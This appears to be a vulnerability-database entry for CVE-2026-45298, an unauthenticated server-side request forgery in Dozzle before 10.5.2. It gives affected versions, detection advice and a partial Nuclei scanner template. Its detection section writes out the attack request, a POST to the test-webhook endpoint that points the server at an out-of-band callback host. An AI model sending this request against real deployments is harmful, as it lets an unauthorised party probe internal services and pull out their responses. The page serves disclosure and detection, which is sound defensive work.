CVE-2026-45298
published 2026-05-26CVE-2026-45298: Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set)…
PriorityP265high8.6CVSS 3.1
AVNACLPRNUINSCCHINAN
EXPLOIT
EPSS
1.49%
70.9th percentile
Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that sends an HTTP POST to the supplied URL with attacker-controlled request headers, and returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx. This vulnerability is fixed in 10.5.2.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| amir20 | dozzle | < 10.5.2 | 10.5.2 |
| amirraminfar | dozzle | < 10.5.2 | 10.5.2 |
| github.com | amir20_dozzle | 0 – 8.14.12 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /api/notifications/test-webhook HTTP/1.1
Content-Type: application/json
{"url":"http://{{interactsh-url}}","headers":{}}↗
- →The vulnerable endpoint POST /api/notifications/test-webhook is unauthenticated in default Dozzle deployments (no DOZZLE_AUTH_PROVIDER set). Monitor for unexpected POST requests to this path from external/untrusted sources. ↗
- →The SSRF payload is delivered as a JSON body with a 'url' key and optional 'headers' key. Inspect POST bodies to /api/notifications/test-webhook for attacker-controlled URLs pointing to internal resources or out-of-band callback hosts. ↗
- →On non-2xx responses from the target, the server returns up to 1MB of the response body to the caller — monitor for large response bodies from this endpoint as a sign of active SSRF data exfiltration. ↗
- →Nuclei template matches on HTTP interaction protocol hit on interactsh and response body containing '"statusCode":200' with HTTP 200 status — use these as detection signals in proxy/WAF logs. ↗
- ·The vulnerability only affects default Dozzle deployments where DOZZLE_AUTH_PROVIDER is not configured. Deployments with an auth provider set may not expose the endpoint unauthenticated. ↗
- ·The fix is present in Dozzle version 10.5.2 and later. Versions prior to 10.5.2 are affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Dozzle - Server Side Request Forgery
nuclei·CVSS 8.6
CVE-2026-45298 [HIGH] Dozzle - Server Side Request Forgery
Dozzle - Server Side Request Forgery
Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.
Template:
id: CVE-2026-45298
info:
name: Dozzle - Server Side Request Forgery
author: theamanrawat
severity: high
description: |
Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.
impact: |
Remote attackers can send arbitr
No writeups or analysis indexed.
2026-05-26
Published